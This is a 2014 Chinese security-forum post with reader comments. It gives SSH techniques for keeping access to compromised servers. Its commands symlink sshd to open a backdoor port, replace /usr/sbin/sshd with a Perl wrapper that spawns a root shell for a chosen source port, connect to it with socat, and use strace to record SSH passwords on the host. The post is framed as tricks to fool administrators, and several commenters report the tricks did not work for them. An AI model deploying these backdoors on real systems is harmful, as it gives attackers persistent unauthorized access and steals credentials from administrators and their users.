渗透技巧之SSH篇

mickey 2014-05-12 13:57:00

用些小技巧,蒙蒙菜鸟管理员。

1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口

肉鸡上执行

mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 

就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。

效果图:

2. 做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接

在肉鸡上执行:

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

在本机执行:

socat STDIO TCP4:10.18.180.20:22,sourceport=13377

如果你想修改源端口,可以用python的struct标准库实现

>>> import struct
>>> buffer = struct.pack('>I6',19526)
>>> print repr(buffer)
'\x00\x00LF'
>>> buffer = struct.pack('>I6',13377)
>>> print buffer
4A

效果图如下:

enter image description here

3. 记录SSH客户端连接密码

搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。

效果图:

评论

L

livers 2014-05-12 16:01:11

顶 mickey!

K

Kavia 2014-05-12 16:15:57

mickey大牛又出大作了,好爽!

X

xiaoL 2014-05-12 16:43:44

简洁实用!

I

insight-labs 2014-05-12 18:32:48

学习了~~,顶Mickey哥~

路人甲 2014-05-12 19:59:28

必须赞一个!

X

Xeyes 2014-05-13 10:48:44

好文~~~~~ 收藏.

L

laterain 2014-05-13 10:57:56

技巧很使用啊,赞x32
终于可以不再跑那个该死的root密码了

动后河 2014-05-13 23:45:53

strace
还不明白

S

Seven.Sea 2014-05-14 13:59:23

Mark,简单实用

路人甲 2014-05-14 14:01:25

mark
补一下文章来源
http://pastebin.com/2NgL8SDE
http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/
https://diogomonica.com/posts/poor-man-s-ssh-keylogger/

路人甲 2014-05-15 10:22:18

来鼓掌!

X

xiaoL 2014-05-15 16:11:58

话说我第一个tip
没试验成功啊- -

冷冷的夜 2014-05-16 11:40:36

不错不错,实用

A

ACGT 2014-05-16 18:32:46

神奇,怎么找到的?搜索还是平时积累?

带馅儿馒头 2014-05-18 15:23:03

感谢分享~

B

Bloodwolf 2014-05-21 11:02:44

对于想长期控制的服务器还是上内核后门好玩

G

gm100861 2014-06-23 10:01:05

太牛逼了,学习。

I

Ivan 2014-12-22 12:04:52

mark

M

Mr丶Mario 2014-12-30 19:54:10

那个图我还一直以为没加载完。刷新了一次。尴尬。

M

m0utain 2015-05-27 08:28:02

想请教一下,那个ln的命令在linux、unix还有一些unix类的机器都试用吗。

M

m0utain 2015-05-28 14:56:45

你好,我想和你探讨一下,第一条中,你说把22端口衍生到31337上,完了之后外面连接31337.用户名为root/bin/ftp/mail,密码随意,我测试的为什么是必须输入正确的用户名密码呢。大神求解释啊,大神用root/bin/ftp/mail这个用户、随意密码登陆成功了吗。

M

m0utain 2015-05-28 15:00:35

方便加下联系方式吗。qq啥的。有很多问题要请教啊

M

m0utain 2015-05-28 15:26:25

米奇大神,写的有点不准啊。

路人甲 2015-11-09 00:10:25

第一个表示,没有成功

K

ki11y0u 2016-01-29 21:14:11

第二个,centos测试不成功。

N

niexinming 2016-02-01 12:48:35

表示:都没有成功,23333

mickey

此号多人用,发表任何信息不代表本人观点

twitter weibo github wechat

随机分类

事件分析 文章:223 篇
Ruby安全 文章:2 篇
二进制安全 文章:77 篇
Python安全 文章:13 篇
Java安全 文章:34 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Yukong

🐮皮

H

HHHeey

好的,谢谢师傅的解答

Article_kelp

a类中的变量secret_class_var = "secret"是在merge

H

HHHeey

secret_var = 1 def test(): pass

H

hgsmonkey

tql!!!

目录